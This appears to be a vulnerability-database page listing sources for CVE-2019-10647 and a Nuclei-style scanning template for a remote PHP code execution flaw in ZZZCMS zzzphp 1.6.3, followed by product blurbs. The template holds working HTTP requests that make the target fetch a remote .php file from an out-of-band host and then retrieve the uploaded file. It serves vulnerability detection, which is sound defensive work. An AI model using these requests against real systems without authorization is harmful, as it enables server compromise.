| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2019-10647 | 31 Oct 202521:02 | – | circl | |
| ZZZCMS zzzphp code injection vulnerability | 2 Apr 201900:00 | – | cnvd | |
| CVE-2019-10647 | 30 Mar 201912:30 | – | cve | |
| CVE-2019-10647 | 30 Mar 201912:30 | – | cvelist | |
| EUVD-2019-2448 | 7 Oct 202500:30 | – | euvd | |
| CVE-2019-10647 | 30 Mar 201913:29 | – | nvd | |
| CVE-2019-10647 | 30 Mar 201913:29 | – | osv | |
| Code injection | 30 Mar 201913:29 | – | prion | |
| CVE-2019-10647 | 22 May 202504:15 | – | redhatcve | |
| VulnCheck KEV: CVE-2019-10647 | 26 Nov 202400:00 | – | vulncheck_kev |
id: CVE-2019-10647
info:
name: ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)
author: Sourabh-Sahu
severity: critical
description: |
ZZZCMS zzzphp v1.6.3 contains a remote code execution caused by lack of restrictions in inc/zzz_file.php, letting attackers execute arbitrary PHP code via a crafted URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter, exploit requires attacker to send malicious URL and server to serve PHP code as plain text.
impact: |
Attackers can execute arbitrary PHP code on the server, potentially leading to full system compromise.
remediation: |
Update to the latest version of ZZZCMS or apply security patches that restrict PHP file handling in inc/zzz_file.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-10647
- https://github.com/kyrie403/Vuln/blob/master/zzzcms/zzzphp%20v1.6.3%20write%20file%20with%20dangerous%20type.md
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-10647
cwe-id: CWE-434
epss-score: 0.06589
epss-percentile: 0.93023
cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.3:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: zzzcms
product: zzzphp
tags: cve,cve2019,rce,zzzphp,intrusive,file-upload,vuln,zzzcms,oast,oob,vkev
flow: http(1) && http(2)
variables:
file: "{{randstr}}.php"
http:
- raw:
- |
POST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
source[]=http://{{interactsh-url}}/{{file}}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains_all(body, "SUCCESS","state")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: regex
name: filename
regex:
- '"title":"([^"]+)"'
internal: true
- raw:
- |
GET /upload/{{filename}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: status
status:
- 200
# digest: 4a0a00473045022100c7ff40256ac965356d6a76db390f56bb5efc879c12edddb5b92cf3733c86c5b50220266f6f395f95bf2aeebb02c7ace83ca9fb4032f6f377c85fd2221e1deb096641:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation